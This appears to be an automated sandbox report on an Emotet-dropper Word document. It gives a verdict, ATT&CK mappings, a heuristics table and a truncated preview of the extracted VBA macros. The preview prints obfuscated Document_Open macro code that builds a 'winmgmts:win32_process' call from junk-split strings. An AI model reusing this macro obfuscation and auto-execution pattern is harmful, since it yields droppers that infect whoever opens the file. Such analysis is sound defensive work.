Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The file is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute automatically. The ClamAV detection and heuristic firings strongly indicate this is an Emotet dropper. The macro likely attempts to download and execute a second-stage payload, a common Emotet behavior, although the script is heavily obfuscated and truncated.
Heuristics (6)

| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| ClamAV: Doc.Dropper.Emotet-7544766-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Dropper.Emotet-7544766-0 |
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro |
| GetObject call | high | OLE_VBA_GETOBJ | GetObject call |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body) |
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7882 bytes |

SHA-256 of macros.bas: a4505d9aa099025ee94bf9c9577d50ea15859cdc5bb7868a58be88c1b6831ca1
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Vycejmzr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Tbcepkcgnhpwx
End Sub
Attribute VB_Name = "Bimqxgzblyrp"
Attribute VB_Base = "0{BF8C4410-2A64-4A43-B608-1E5B4D4FB943}{A247CEC1-BA27-462C-A0B3-0210073727AD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Flijvcefzoj"
Function Pitxyglphi()
Select Case Ewontzdrytyk
Case 5815
Dwkkvvkxhfhwq = Log(3331)
Iamzmqhgtwnq = 4
Odmxxoop = CSng(trrD0)
Case Kkhoifxibxqsm
Iwproifnwsc = ChrW(RSd)
Tngsyoobjsyny = 472
Zkvrbhpsyxn = Cos(rfTD3Iu)
Case 5
Xkwgkzpnr = 76
Yvozerdpdqnl = Atn(3391)
Tqevhvkxje = Sin(Rdzpbimbtftpo)
End Select
Hnkanudydg = ChrW(wdKeyP)
Select Case Nabshejvqztq
Case 5815
Izpjwccun = Log(3331)
Gistxlbg = 4
Wiqtrgvybqncu = CSng(trrD0)
Case Qefvrtmfp
Rbtoskcgmqzqf = ChrW(RSd)
Vlepdotnh = 472
Kqfjdarvoufm = Cos(rfTD3Iu)
Case 5
Zomqroaz = 76
Baayhyomixzla = Atn(3391)
Yzjhmpygme = Sin(Wprulgihc)
End Select
Drmrfxlv = Hnkanudydg + Bimqxgzblyrp.Banzydziriljk + Bimqxgzblyrp.Svndpgudl
Select Case Aozvwrrckhotr
Case 5815
Ivhqmzaug = Log(3331)
Pwtivkfqxyx = 4
Euqlbhgalz = CSng(trrD0)
Case Wfhyzutbfc
Bmeobcjkcv = ChrW(RSd)
Jpsympdwoaye = 472
Xeergcahjpds = Cos(rfTD3Iu)
Case 5
Qugbtppjbu = 76
Yxubnzqjefg = Atn(3391)
Jrcfdvtqtgt = Sin(Kicncjcqdcmib)
End Select
losd = Bimqxgzblyrp.Cvlpoddz.GroupName
Yayiwzyefmtww = Split(Drmrfxlv + LTrim(LTrim(losd)), "//====dsfnnJJJsm388//=")
Select Case Ynahheexq
Case 5815
Qznnixxbsdiac = Log(3331)
Ooofayrhj = 4
Fvdtifgijri = CSng(trrD0)
Case Irvzeqmx
Qpjlcxyrekurb = ChrW(RSd)
Uduuhrfflxjds = 472
Rpowndyuelkz = Cos(rfTD3Iu)
Case 5
Hqpxajmrdjikj = 76
Sugoltfcekv = Atn(3391)
Qjxrbhdgtf = Sin(Gzlfocuaglqe)
End Select
Pitxyglphi = Dkmsucacshca + Join(Yayiwzyefmtww, "") + Dkmsucacshca
Select Case Zncvcdsoiodt
Case 5815
Pvpsbnpj = Log(3331)
Cpbourmj = 4
Rdlqgnbqw = CSng(trrD0)
Case Ckpudlbodgqaa
Cetqbuzklm = ChrW(RSd)
Lnlymjeaemuqg = 472
Qabdkwulxwgc = Cos(rfTD3Iu)
Case 5
Aditmqar = 76
Qwthpkcj = Atn(3391)
Ijkizcqcocghc = Sin(Imxuvvzt)
End Select
End Function
Function Tbcepkcgnhpwx()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Bimqxgzblyrp.Fmgsnpdkhc + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
Select Case Utqslcezgnb
Case 5815
Qqvtlseeyqmh = Log(3331)
Zahsqrozoswd = 4
Rtyyyjsu = CSng(trrD0)
Case Qfgjwcdkbhfyy
Seqbdxifcm = ChrW(RSd)
Ojbcfblclkfd = 472
Lcfwtvenfeb = Cos(rfTD3Iu)
Case 5
Yiaewqjpbafax = 76
Ziynopmfzftj = Atn(3391)
Dwamfmtl = Sin(Mczjczwvjm)
End Select
E = "//====dsfnnJJJsm388//="
Select Case Kuffqeeauqol
Case 5815
Yqhqqkta = Log(3331)
Iukdcjkfyb = 4
Mltvvokqfqgn = CSng(trrD0)
Case Misrbkwswvt
Lginjvfdwwupe = ChrW(RSd)
Hsnxknwbn = 472
Uwupycuq =
... (truncated)
```